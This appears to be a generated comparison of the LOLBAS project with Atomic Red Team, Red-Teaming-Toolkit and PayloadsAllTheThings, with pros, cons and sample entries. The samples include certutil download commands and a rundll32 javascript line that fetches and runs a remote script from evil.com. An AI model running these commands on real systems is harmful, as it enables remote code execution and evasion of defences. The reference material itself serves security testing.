Pros of Atomic Red Team

• Broader scope, covering various attack techniques across different platforms
• Provides executable tests for validating security controls
• Regularly updated with new techniques and community contributions

Cons of Atomic Red Team

• More complex to implement and execute tests
• Requires more resources and setup time
• May trigger false positives in security tools during testing

Code Comparison

LOLBAS example (PowerShell):

Certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Atomic Red Team example (YAML):

- name: Download Files with Certutil
  auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef
  description: |
    Uses certutil.exe to download a file
  supported_platforms:
    - windows
  executor:
    command: |
      certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml test.yaml
    name: command_prompt

The LOLBAS project focuses on documenting individual Living Off the Land binaries and scripts, while Atomic Red Team provides a comprehensive framework for testing various attack techniques, including those that use LOLBins. Atomic Red Team offers more detailed test cases and execution guidance, but requires more setup and resources. LOLBAS is simpler to reference but lacks the executable tests provided by Atomic Red Team.

Pros of Red-Teaming-Toolkit

• Broader scope covering various red teaming techniques and tools
• Includes resources for different stages of penetration testing
• Regularly updated with new tools and techniques

Cons of Red-Teaming-Toolkit

• Less focused on specific Living Off the Land techniques
• May require more expertise to navigate and utilize effectively
• Not as well-organized or categorized as LOLBAS

Code Comparison

LOLBAS example (YML format):

- Name: Certutil.exe
  Description: Windows binary used for handling certificates
  Author: 'Oddvar Moe'
  Created: 2018-05-25
  Commands:
    - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
      Description: Download and save 7zip to disk
      Usecase: Download file from Internet
      Category: Download
      Privileges: User
      MitreID: T1105
      MitreLink: https://attack.mitre.org/wiki/Technique/T1105
      OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Red-Teaming-Toolkit doesn't provide specific code examples but rather links to various tools and resources.

Pros of PayloadsAllTheThings

• Broader scope covering various attack techniques and payloads
• More frequently updated with contributions from a larger community
• Includes detailed explanations and examples for each technique

Cons of PayloadsAllTheThings

• Less focused on Windows-specific binaries and scripts
• May require more filtering to find relevant information for specific use cases
• Lacks a standardized format for each entry, making it harder to parse programmatically

Code Comparison

LOLBAS:

- Name: Rundll32.exe
  Description: Used to execute JavaScript, VBScript, and other code
  Commands:
    - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://evil.com/malicious.sct")"
      Description: Executes JavaScript code from a remote script

PayloadsAllTheThings:

# Rundll32 execution
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://evil.com/malicious.sct")"
rundll32.exe shell32.dll,Control_RunDLL payload.dll

Both repositories provide valuable information for security professionals, with LOLBAS focusing specifically on Windows binaries and scripts, while PayloadsAllTheThings offers a wider range of attack techniques and payloads across various platforms. The choice between them depends on the specific needs of the user and the target environment.